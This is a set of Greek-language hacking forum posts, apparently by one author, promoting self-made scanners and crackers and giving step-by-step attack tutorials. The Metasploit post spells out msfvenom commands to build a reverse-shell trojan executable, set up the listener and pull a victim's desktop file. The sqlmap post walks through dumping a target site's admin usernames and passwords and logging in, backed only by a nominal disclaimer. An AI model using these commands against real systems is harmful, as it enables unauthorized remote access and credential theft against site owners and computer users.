Ξάπλωσε στο κρεβάτι σου και άσε το script να σκανάρει. Αυτός και ο σκοπός μου στο συγκεκριμένο που έφτιαξα. Πάμε να δούμε πως λειτουργεί Του έχω ρίξει κάποιες αναβαθμίσεις και αυτός είναι ο λόγος που το βγάζω προς τα έξω. Βέβαια, πριν συνεχίσεις να διαβάζεις, θέλω να σου πω πως ακριβώς για τον λόγο που θα κάθεσαι στο κρεβάτι σου και αυτό θα τρέχει χάρη στον κόπο μου, θα χρεωθεί το script 10 ευρώ. Αν ενδιαφέρεσαι λοιπόν άκουσέ με. Το script αυτό έχει τα παρακάτω προς το παρόν CHECK HOST CMS SCAN DNS LOOKUP REVERSE IP UPLOAD DIR CHECK SUBDOMAIN SCANNER DIRECTORY SCANNING PORT SCANNING Δες και τα παρακάτω σκριν για το κάθε τι. Σου έχω βάλει αρκετές επιλογές νομίζω για να κάτσεις στο κρεβατάκι σου αραχτός. Βέβαια το πρόγραμμα ενημερώνεται όπως ενημερώθηκε και σήμερα (προστέθηκαν παραπάνω cms για το cms scanner). Σε μελλοντικές ενημερώσεις θα προστεθεί και sql injection scanner και xss scanner και ου το καθεξής απο vulns. Όσο για το screen επειδή κάτι δεν πρόσθεσα, μπορείς με εντολή -w να βάλεις δική σου wordlist, αλλιώς αν δεν βάλεις τρέχει μία default για τα dir scans. Επίσης θα προστεθεθεί και εντολή -o κάποια στιγμή για να αποθηκεύει output. Από την στιγμή που θα το αγοράσεις και θα το πάρεις στα χέρια σου, θα έχεις από εμένα υποστήριξη και για ότι πρόβλημα παρουσιαστεί ή απορία έχεις θα μπορείς να επικοινωνήσεις μαζί μου είτε σε μήνυμα εδώ στο φόρουμ είτε στο email μου billymaata@gmail.com. Το πρόγραμμα δείχνει σε τι cms τρέχει το target, dns, reverse ip, πιθανά upload dirs σε ένα site, ότι subdomain υπάρχει και δεν υπάρχει, dir scanning και port scanning. Όσο ανεβαίνει η αξία του script, τόσο θα αυξάνονται και τα χρήματα. Πιστεύω πως ήδη το πουλάω αρκετά φθηνά. Βέβαια αν ήδη θα το έχεις δεν θα χρειαστεί να ξαναπληρώσεις, ότι ενημέρωση και αν γίνεται. Πως γίνεται η πληρωμή: Στείλε μου μήνυμα μην μπερδευτούμε. Enjoy.

Καλησπέρα. Σήμερα θα δούμε πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή από metasploit. Αρχικά θα ανοίξουμε το msfvenom για να δημιουργήσουμε το trojan το οποίο θα μας δώσει την πρόσβαση msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.161.68 LPORT=4444 -f exe > greekhacking.exe -p = payload -LHOST: localhost LPORT: local port -f: file Για να δούμε την ip μας και να την περάσουμε στο lhost, κάνουμε ifconfig σε ένα άλλο τερματικό. Αφού φτιάξουμε trojan, ανοίγουμε το metasploit (msfconsole) Αφού ανοίξει πληκτρολογούμε use multi/handler Αμέσως μετά βάζουμε payload. set PAYLOAD windows/x64/meterpreter/reverse_tcp Αφού βάλουμε και payload πατάμε show options για να δούμε τις επιλογές μας. Βλέπουμε ότι είναι κενό το lhost οπότε πάμε πάλι στην εντολή ifconfig για να το περάσουμε. Οπότε πατάμε "set LHOST <ip>". Να πω επίσης ότι αν το LPORT σας είναι default αλλάξτε το ανάλογα με το τι βάλατε στο msfvenom πληκτρολογόντας "set LPORT <PORT>". Τώρα θα πάμε σε ένα άλλο τερματικό έτσι ώστε να ανοίξουμε server για να μπορέσουμε να κάνουμε την επίθεση. Πάμε σε τερματικό και πληκτρολογούμε αυτό Όταν λοιπόν είμαστε έτοιμοι, γράφουμε την εντολή exploit στο τερματικό μας Τώρα το metasploit περιμένει αντίδραση από τον χρήστη έτσι ώστε να μας δώσει πρόσβαση. Πάμε να την πάρουμε. Πάμε στα windows στην πορκειμένη περίπτωση που είμαι local, και κατεβάζουμε το αρχείο. http://<ip>/greekhacking.exe (όπως ονόμασα το αρχείο στο msfvenom) και αμέσως μετά το τρέχουμε και βλέπουμε παρακάτω πως όταν το ανοίγουμε το metasploit αντιδρά και αυτό και μας δίνει πρόσβαση (Συγγνώμη αν δεν πίασει το gif) Αφού μας δώσει την πρόσβαση μπορούμε να γράψουμε την εντολή help για να δούμε τα commands που μπορούμε να χρησιμοποιήσουμε. Στην περίπτωσή μου απλά θα πάω στο path C:\\Users\User\Desktop και θα κάνω ls για να δω τα αρχεία στο desktop του χρήστη Εδώ είναι το desktop (επιφάνεια εργασίας). Πάμε να δούμε τι έχει μέσα το αρχείο greekhacking.txt και να το "υποκλέψουμε". Για να το κάνουμε αυτό πατάμε download greekhacking.txt Κατέβηκε. Πάμε στο path /home/mata/ για να ανοίξουμε το αρχείο με vi έτσι ώστε να το δούμε Ανοίγουμε το αρχείο και βλέπουμε πως έχει μέσα αυτό ακριβώς. Πάμε και στην συσκευή του θύματος να δούμε πως είναι το αρχείο Ακριβώς το ίδιο! Αυτό ήταν λοιπόν το tutorial για σήμερα, ήταν ΜΟΝΟ για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη --------------------------------------------------------------------------------------------------------------- Buy Me A Coffee: https://www.buymeacoffee.com/mataroot Συνδρομή: https://www.buymeacoffee.com/mataroot/membership Discord Server: https://discord.gg/aStuy26X

Καλησπέρα. Σήμερα πήραμε την απόφαση να μοιραστούμε μαζί σας το Desktop App του Greek Hacking. Ο λόγος που δημιουργήθηκε το App είναι απλά ο λόγος όπως δημιουργήθηκε και το Discord app για παράδειγμα. Δηλαδή; Είναι ακριβώς ίδιο με το greekhacking.gr απλά κατά την γνώμη μας διευκολήνει τον χρήστη ενώ ανοίγει το pc του να το έχει σε τελείως διαφορετική καρτέλα το Greek Hacking και να είναι και στο Desktop του. Screenshot: 1.) Κατεβάζουμε το αρχείο rar από το mediafire 2.) Το κάνουμε Extract κάπου (επιλογή σας) 3.) Πηγαίνουμε στο .exe αρχείο και πατάμε δεξί κλικ, δημιουργία συντόμευσης (create shortcut) 4.) Παίρνουμε το SHORTCUT και το κάνουμε drag and drop στην επιφάνεια εργασίας μας. Προσοχή μην σβήσετε κάποιο .dll αρχείο μέσα από τον φάκελο. Βάλτε τον κάπου ασφαλής και κρατήστε το shortcut στο desktop σας χωρίς να το κάνετε κάποιο rename. Ευχαριστούμε. Download: MediaFire virustotal: https://www.virustotal.com/gui/file/401bf0b823f2fdb705fd6e094f0cc95c86245aacc4cd09b1d9e937e01c6b4bdc?nocache=1

Κλασσικά άλλο ένα update για το greekhacking. v1.2.8 αν και πλέον βρίσκεται στο 1.2.9, απλά επειδή άλλαξα κάτι μόνο εσωτερικά και δεν έχει αλλαγές που φαίνονται, τράβηξα το βίντεο στο 1.2.8. Δείτε λοιπόν πως είναι πλέον το πρόγραμμα μετά τα updates git clone https://github.com/MataGreek/greekhacking.git

Σήμερα πήρα την απόφαση να φτιάξω ένα πρόγραμμα το οποίο είναι αρκετά βοηθητικό για όλους όσους θέλουν να βρίσκουν subdomains σε websites, τα οποία είναι αρκετά σημαντικά για αρκετούς λόγους , είτε αυτοί είναι ηθικοί είτε κακοπροαίρετοι. Αν θυμάστε και πιο παλιά, είχα κάνει μια ανάρτηση ενός προγράμματος που επίσης ήταν subdomain finder. Αλλά εδώ αλλάζουν τα πράγματα αρκετά. Πάμε λοιπόν να πούμε και να δούμε τι ακριβώς φτιάξαμε. Το πρόγραμμα λέγεται ypodomainfind3r. Είπαμε παραπάνω σε τι μας βοηθάει. Πάμε λοιπόν να κάνουμε μία σύγκριση σε σχέση με το προηγούμενο πρόγραμμά μου. Το προηγούμενο λειτουργούσε με μία wordlist που έτρεχε και ελπίζαμε κάποια στιγμή να βρει subdomains τα οποία θα υπάρχουν στην λίστα. Κρίμα όμως για την υπομονή και την επιμονή αυτή. Σε αυτό που έφτιαξα τώρα, ψάχνει μέσα στο "διαδίκτυο" να σας το πω πιο απλά και βγάζει όλα τα αποτελέσματα subdomains της ιστοσελίδας που δώσατε. Επίσης να πω ότι η διάρκεια για να βρει όλα τα subdomains είναι περίπου 5 εως 10 δευτερόλεπτα. Οπότε καταλαβαίνουμε ότι δεν περνάει κανένα μισάωρο μέχρι να τελειώσει όπως πριν. Πάμε να δούμε την χρήση του τώρα Αφού το κάνουμε install git clone https://github.com/MataGreek/ypodomainfind3r.git cd ypodomainfind3r/ pip install -r requirements.txt Λοιπόν. Από δω και πέρα θέλω να σας εξηγήσω τι έχω κάνει. Για να ανοίξουμε και να λειτουργήσουμε το πρόγραμμα πρέπει να δώσουμε τις εξής εντολές "python3" "-u" "-o (optional)" Ας δώσουμε ένα παράδειγμα python3 ypodomainfind3r.py -u "target" Με αυτό το command, του λέμε σε ποιο url να ψάξει. Στην παρακάτω εικόνα έψαξε στο example.com Αυτό κάνει το command -u. Πάμε τώρα να δούμε τι κάνει το -o. python3 ypodomainfind3r.py -u example.com -o file.txt Βάζουμε λοιπόν -o (και το αρχείο που θέλουμε να δημιουργήσουμε). Αφού το κάνουμε αυτό και τελειώσει το scanning, αν πάμε μετά μέσα στον φάκελο output που έχει το πρόγραμμα "cd output/" θα δούμε πως υπάρχει ένα αρχείο το οποίο λέγεται file.txt ή όπως αλλιώς το έχετε ονομάσει. Αυτό λοιπόν μέσα έχει το output του scanning με όλα τα subdomains. Και επειδή πρέπει να σας πείσω ότι δεν έχω πρόθεση να "χακάρω" τον υπολογιστή ή το κινητό σας ας ανεβάσω και ένα virustotal. https://www.virustotal.com/gui/file/e8c71068fca9a1d51af9257cebeb95459e12ac494d0084b2369b260c251844b2?nocache=1 Μόνο για ηθικούς σκοπούς τσογλάνια. Enjoy

Καλησπέρα φόρουμ. Σήμερα είμαι αρκετά χαρούμενος μπορώ να πω διότι έχουν γίνει αρκετε΄ς αναβαθμίσεις στο πρόγραμμα που έχω φτιάξει για το Greek Hacking. Έκανα αλλαγές αυτόν τον καιρό και σήμερα κατάφερα να διορθώσω αρκετά bugs που είχε. Όσοι λοιπόν έχετε το πρόγραμμα, θα σας ζητηθεί Update στο version 1.2.4, ενώ όσοι δεν το έχετε μπορείτε να το κατεβάσετε από το link που θα σας βάλω από κάτω. Παρακαλώ ΜΟΝΟ για καλούς σκοπούς να χρησιμοποιηθεί το πρόγραμμα και όχι για παράνομο σκοπό. Όσοι έχετε το πρόγραμμα, σε αυτήν την περίπτωση πληκτρολογούμε Y ή yes για να γίνει το update. Έπειτα πρέπει να ανοίξετε και πάλι το πρόγραμμα για να πραγματοποιηθούν οι αλλαγές. Όσοι δεν το έχετε, θα πρέπει να τρέξετε πρώτα το αρχείο setup.py έτσι ώστε να κατεβούν όλα τα Requirements. Επίσης όσοι δεν έχετε την "pip" μην αγχώνεστε, θα κατεβεί αν τρέξετε το setup. Όσοι θέλετε βέβαια και δεν εμπιστεύεστε το setup.py μπορείτε να τρέξετε και το pip install -r requirements.txt. Αφού λοιπόν ανοίξουμε και πάλι το πρόγραμμα, πρέπει να βεβαιωθούμε πως τα version είναι ακριβώς τα ίδια. Έπειτα μπορείτε να χρησιμοποιήσετε το πρόγραμμα κανονικότατα. Από κάτω σας βάζω και μία εικόνα του virustotal. Virus total Link: https://www.virustotal.com/gui/file/4aafe52c17c622d2c97c3bd1058e4b712f5577d8add2eb369b54e3007b2c4a9a?nocache=1 Download program: https://github.com/MataGreek/greekhacking Terminal: git clone https://github.com/MataGreek/greekhacking.git Commands to run before open the program: python3 setup.py or if you have pip installed, pip install -r requirements.txt python3 greekhacking.py

[Greekhacking program V1.1.8] ######################## Νέα ενημέρωση στο πρόγραμμά μου. Έκδοση 1.1.8. Δεν έχω κάνει τρελή αλλαγή απλά το βρήκα καλό να προσθέσω κάτι, συγκεκριμένα στο Password Generator. Όσοι έχετε το πρόγραμμά μου γνωρίζετε πως όταν ανοίγει σας ζητάει να επιλέξετε έναν αριθμό για να ανοίξετε το αντίστοιχο πρόγραμμα. Στο νούμερο 4 λοιπόν που βρίσκεται το Password Generator έγιναν αλλαγές. Τι άλλαξε; ######## Το Password Generator για όσους δεν ξέρετε σου κάνει generate έναν τυχαίο κωδικό με σύμβολα, κεφαλαίους, μικρούς χαρακτήρες και αριθμούς έτσι ώστε να είναι ασφαλής. Όμως επέλεξα να το κάνω ακόμα πιο ασφαλή. Έβαλα το πρόγραμμα να ρωτάει αν θέλετε να κρυπτογραφήσετε τον κωδικό που σας έκανε generate γρήγορα και απλά. Απλά απαντάτε ένα "Yes" και θα σας βγάλει τον κωδικό που σας δώθηκε κρυπτογραφημένο. Για περισσότερες πληροφορίες και εξήγηση στείλτε μήνυμα Πάρτε ένα παράδειγμα στην παρακάτω εικόνα. Κατεβάστε το πρόγραμμα εδώ: https://github.com/MataGreek/greekhacking VIRUS TOTAL ΕΧΩ ΒΑΛΕΙ ΣΤΗΝ ΠΡΩΤΗ ΜΟΥ ΑΝΑΡΤΗΣΗ ΟΤΑΝ ΠΑΡΟΥΣΙΑΣΑ ΤΟ ΠΡΟΓΡΑΜΜΑ. ΠΑΡΑΚΑΛΩ ΤΣΕΚΑΡΕΤΕ ΤΗΝ

Καλημέρα / καλησπέρα φόρουμ. Άλλο ένα νέο προγραμματάκι από εμένα και αυτήν την φορά ένα Admin Panel finder. Πάμε να δούμε πληροφορίες. Ή μάλλον πρίν δούμε, θα σας δείξω ότι δεν περιέχει κάτι κακόβουλο εσωτερικά για να μην έχετε και το άγχος. \ Τώρα που το τσεκάραμε και αυτό πάμε να δούμε το πρόγραμμα. Αρχικά το έφτιαξα αρκετά απλό όπως και τα προηγούμενα. Απλά το ανοίγετε, γράφετε το url και γίνεται το Scan. Πάμε να δούμε Εδώ βλέπουμε ότι έχω βάλει το url (κρυμμένο) και μας ενημερώνει το πρόγραμμα τι ώρα άρχισε το scan. Αμέσως μετά αρχίζει να τρέχει ένα Wordlist το οποίο εννοείται πως μπορείτε να το επεξεργαστείτε και να βάλετε και εσείς μέσα ότι θέλετε και εννοείται πως για να ξεχωρίζουμε το σωστό το οποίο μας δίνει status 200 το έχω βάλει με πράσινα και [+]... Και αυτά που είναι error 404 τα έχω βάλει με κόκκινα και [-]... Στο τέλος επίσης σας ενημερώνει τι ώρα τελείωσε το scan. Τώρα θέλω να σας πω λίγο για τα Requirements. 1.) Πρέπει αναγκαστικά να έχετε την τρίτη έκδοση της Python. Δηλαδή όχι python2 αλλά python3. 2.) Με το που ανοίξετε τον φάκελο με το πρόγραμμα, θα κατεβάσετε το requirements.txt γράφοντας την εντολή " pip install requirements.txt ". Αν έχετε κάποιο πρόβλημα γενικά με το πρόγραμμα παρακαλώ ενημερώστε με για να φτιαχτεί. Ευχαριστώ GitHub: https://github.com/MataGreek/GHADM

ΠΡΟΣΟΧΗ! ΤΟ ΠΡΟΓΡΑΜΜΑ ΠΡΟΣ ΤΟ ΠΑΡΟΝ ΤΡΕΧΕΙ ΜΟΝΟ ΣΕ WINDOWS Καλησπέρα φόρουμ. Σήμερα έφτιαξα ένα νέο προγραμματάκι το οποίο είναι αρκετά χρήσιμο για τον κόσμο του Hacking. Γιατί είναι αρκετά χρήσιμο; Διότι μπορεί να σκανάρει και να βρει Subdomains μίας ιστοσελίδας. Είναι αρκετά σημαντικό να βρίσκουμε τα Subdomains μιας ιστοσελίδας όταν θέλουμε να "χακάρουμε" κάτι διότι παίρνουμε περισσότερες πληροφορίες ή πολύ απλά μπορεί αυτό το Subdomain να έχει μία παραπάνω ευπάθεια. Μπορείτε αυτά να τα διαβάσετε και σε οδηγούς του φόρουμ Πάμε να δούμε την χρήση του προγράμματος και επίσης να κάνουμε ένα scan για το αν έχει ιο το πρόγραμμά μου. Ωραία αφού είδαμε ότι προφανώς το πρόγραμμα δεν έχει κάποιο trojan ή ransomware ή άλλους τύπους ιών (Αυτό έλλειπε να σας πετάξω και ιο) Πάμε να προχωρήσουμε παρακάτω, στην χρήση του. Η χρήση λοιπόν είναι ΠΑΡΑ πολύ απλή. Πάμε να δούμε USAGE ######## open cmd cd {path} cd windows pip install -r requirements python ghsubfinder ########################## Να προσθέσω ότι μέσα στον φάκελο υπάρχει και ένα wordlist το οποίο μπορείτε να το επεξεργαστείτε και να βάλετε κι άλλα subdomains αν χρειαστεί. Github: https://github.com/MataGreek/ghsubfinder Mediafire: https://www.mediafire.com/file/04j8b5dx070kj8x/subdomain_finder.rar/file

Πήρα την απόφαση, να αρχίσω να ανεβάζω νέους οδηγούς σχετικά με το Hack The Box, αφού πρώτα απ' όλα είναι νόμιμο, είναι ενδιαφέρον αλλά ταυτόχρονα μαθαίνεις μέσα από αυτό. Όσοι δεν γνωρίζετε το HTB είναι μία κοινότητα, ίσως η μεγαλύτερη στον κόσμο ή αν όχι η μεγαλύτερη, μία από τις μεγαλύτερες, η οποία σου παρέχει κάποια δωρεάν Machines έτσι ώστε να εξασκηθείς και να προσπαθείς να τα "σπάσεις". Πιστέψτε με είναι αρκετά ενδιαφέρον και αξίζει να κάνετε Εγγραφή εκεί. Αν θέλετε να κάνετε εγγραφή πατήστε εδώ: https://app.hackthebox.eu/ Αυτό που θα κάνω εγώ λοιπόν, είναι να σας βγάζω οδηγούς εδώ στο ΠΩΣ θα γίνει pwned ένα μηχάνιμα. Ίσως σκεφτώ να φτιάξω και στο YouTube κάτι αλλά βίντεο με κάμερα κτλ. Θα δω Enjoy your ethical hacking

Το Greek Hacker MD5 HASH CRACKER είναι ένα πρόγραμμα αποκρυπτογράφησης, δημιουργήθηκε για νόμιμες ενέργειες και η ομάδα του Greek Hacking δεν φέρει καμία ευθύνη για το πως θα το χρησιμοποιήσετε. Πριν αρχίσουμε να αναφέρω πως έχει δύο εκδόσεις. Μία για Windows και μία για Linux και αυτός είναι και ο σκοπός των δύο φακέλων που θα δείτε στο Github. Όσοι έχετε Windows μπείτε στον φάκελο windows και όσοι Linux στον φάκελο Linux. Και που ξέρουμε αν τα προγράμματα που φτιάχνεις και μας δίνεις δεν έχουν ιούς; Καλή ερώτηση και πολύ εύκολη να απαντηθεί. Πρώτον δεν έχω κανέναν σκοπό να βλάψω καμία μηχανή και κανένα σύστημα, δεύτερον υπάρχει το VirusTotal που θα βάλω screenshot από κάτω, και τρίτο και σημαντικότερο... Μόνο ηθικό hacking. Ας αρχίσουμε. VIRUS TOTAL SCREENSHOT ----------------------------------------- PROGRAM SCREENSHOTS ----------------------------------------- Πρώτα απ' όλα ας αρχίσουμε με το τι βλέπουμε με το που κατεβάσουμε το πρόγραμμα. Έχω χωρίσει 3 φακέλους (Windows, Linux, Wordlist). Τους πρώτους δύο τους αναλύσαμε πιο πάνω. Στον φάκελο Wordlist υπάρχει μία ΜΙΚΡΗ wordlist προς το παρόν που έφτιαξα για εσάς, για να μην κατεβάζετε αν δεν έχετε ή για να μην γράφετε εσείς. INSTALL Η εγκατάσταση δεν είναι τίποτα άλλο παρα μόνο να γράψετε αυτήν την εντολή: pip install -r requirements.txt Με αυτήν την εντολή θα κατεβάσετε όλα τα προαπαιτούμενα για να ανοίξει το πρόγραμμα. Αμέσως μετά θα μπείτε στον φάκελο Linux ή Windows και θα ανοίξετε το πρόγραμμα γράφοντας: python3 ghmd5cracker.py USAGE Αφού το ανοίξετε θα σας πει να βάλετε το path του wordlist. Οπότε βάζετε το path χωρίς να βάλετε σύμβολα όπως, "" ή '' Όταν βάλετε σωστά το path θα πρέπει να βάλετε το md5 hash που θέλετε να αποκρυπτογραφήσετε. Μετά το πρόγραμμα θα ψάχνει από μόνο του για να αποκρυπτογραφήσει τον κωδικό. Ευχαριστώ Download ==> https://github.com/MataGreek/GH-MD5-CRACKER git clone https://github.com/MataGreek/GH-MD5-CRACKER.git Αν θέλετε να στηρίξετε την δουλειά μου παρακαλώ κάντε ένα Donate εδώ: https://www.paypal.com/paypalme/vbourant

Καλημέρα/Καλησπέρα φόρουμ. Την προηγούμενη φορά στην ανάρτησή μου, είχα δείξει πως κάνουμε sql injection με Windows. Σήμερα θα δούμε πως κάνουμε το ίδιο και σε Linux απλά και εύκολα. Για αρχή, πρέπει να έχουμε επιλέξει τον στόχο μας και αν θυμάστε στην προηγούμενη ανάρτηση είχαμε πει πως καταλαβαίνουμε αν είναι ευπαθής η σελίδα. Αν δεν θυμάστε πηγαίντε πρώτα διαβάστε την προηγούμενη ανάρτηση και μετά ελάτε εδώ. Αφού λοιπόν έχουμε επιλέξει τον στόχο μας, ανοίγουμε το Terminal (Το τερματικό) του Linux μας. ΕΚΕΙ ΓΡΑΦΟΥΜΕ ΤΟΝ ΕΞΗΣ ΚΩΔΙΚΑ sqlmap -u "Ο ΣΤΟΧΟΣ" --dbs Αφού λοιπόν πατήσουμε Enter, αυτό θα προσπαθήσει να ψάξει για την βάση, ή μάλλον τις βάσεις δεδομένων που έχει η ιστοσελίδα. Δείτε παρακάτω ΟΤΑΝ ΤΕΛΕΙΩΣΕΙ ΤΟ SCAN ΘΑ ΜΑΣ ΔΕΙΞΕΙ ΤΑ ΕΞΗΣ Μας εμφανίζει τις βάσεις και προφανώς εμείς κάτι θα πρέπει να τις κάνουμε. Θα πρέπει να γράψουμε έναν κώδικα έτσι ώστε να δώσουμε εντολή για το ΠΟΙΑ βάση να ψάξει και ΤΙ να ψάξει μέσα σε αυτήν. Αναλυτικά γράφεται ο παρακάτω κώδικας sqlmap -u "Ο ΣΤΟΧΟΣ" -D (ΤΟ --DBS ΤΟ ΑΛΛΑΖΟΥΜΕ ΣΕ -D ΔΗΛΑΔΗ -DATABASE) "Η ΒΑΣΗ" --tables (ΤΑ TABLES ΠΟΥ ΘΑ ΜΑΣ ΟΔΗΓΗΣΟΥΝ ΣΤΑ COLUMNS) Αμέσως μετά, θα μας εμφανίσει μία ολόκληρη λίστα από τα Tables. Κάπως έτσι Καλό ε; Δεν τελειώσαμε ακόμα όμως μάγκες μου. Πρέπει να βρούμε και τα Columns τα οποία βρίσκονται μέσα στο Table που θα επιλέξουμε. Για να βρούμε τα Columns, γράφουμε τον παρακάτω κώδικα Ο ΚΩΔΙΚΑΣ ΓΙΑ ΝΑ ΒΡΟΥΜΕ ΤΑ COLUMNS sqlmap -u "Ο ΣΤΟΧΟΣ" -D (ΤΟ --DBS ΤΟ ΑΛΛΑΖΟΥΜΕ ΣΕ -D ΔΗΛΑΔΗ -DATABASE) "Η ΒΑΣΗ" -T (Το table. π.χ Admin) --columns (για να βρουμε τα columns) Όπως καταλάβατε, όταν θέλουμε να δηλώσουμε κάτι, στην προκειμένη περίπτωση την βάση και τα tables, βάζουμε μόνο το πρώτο γράμμα με κεφαλαίο και με μία παυλίτσα (π.χ --dbs = -D, --tables = -T, --columns = -C). Αφού βρεί τα columns θα μας τα εμφανίσει κάπως έτσι. ΤΑ COLUMNS Τώρα αφού μας εμφάνισε τα Columns, πάμε να βρούμε το όνομα χρήστη και τον κωδικό του διαχειρηστή της ιστοσελίδας. Στην προκειμένη περίπτωση τα ονόματα είναι «user_name» «password». Γράφουμε λοιπόν τον παρακάτω κώδικα Ο ΚΩΔΙΚΑΣ ΓΙΑ ΝΑ ΕΜΦΑΝΙΣΟΥΜΕ ΤΑ ΑΠΟΤΕΛΕΣΜΑΤΑ sqlmap -u "Ο ΣΤΟΧΟΣ" -D (ΤΟ --DBS ΤΟ ΑΛΛΑΖΟΥΜΕ ΣΕ -D ΔΗΛΑΔΗ -DATABASE) "Η ΒΑΣΗ" -T (Το table. π.χ Admin) -C user_name,password(Τα columns μας) --dump (dump = για να εμφανίσει τα αποτελέσματα) Είμαστε έτοιμοι για να μας βγάλει τα αποτελέσματα που επιλέξαμε, δηλαδή τα ονόματα χρήστη και τους κωδικούς των διαχειρηστών. Δείτε την παρακάτω εικόνα! ΤΑ ΑΠΟΤΕΛΕΣΜΑΤΑ Τέλεια! Τώρα αν γνωρίζουμε το Admin Login από το οποίο συνδέεται ο διαχειρηστής, πάμε και κάνουμε σύνδεση (Δεν φέρω καμία ευθύνη για τις πράξεις σας, καλό θα ήταν να μην το χρησιμοποιήσετε για κακό σκοπό) Ευχαριστώ 🙂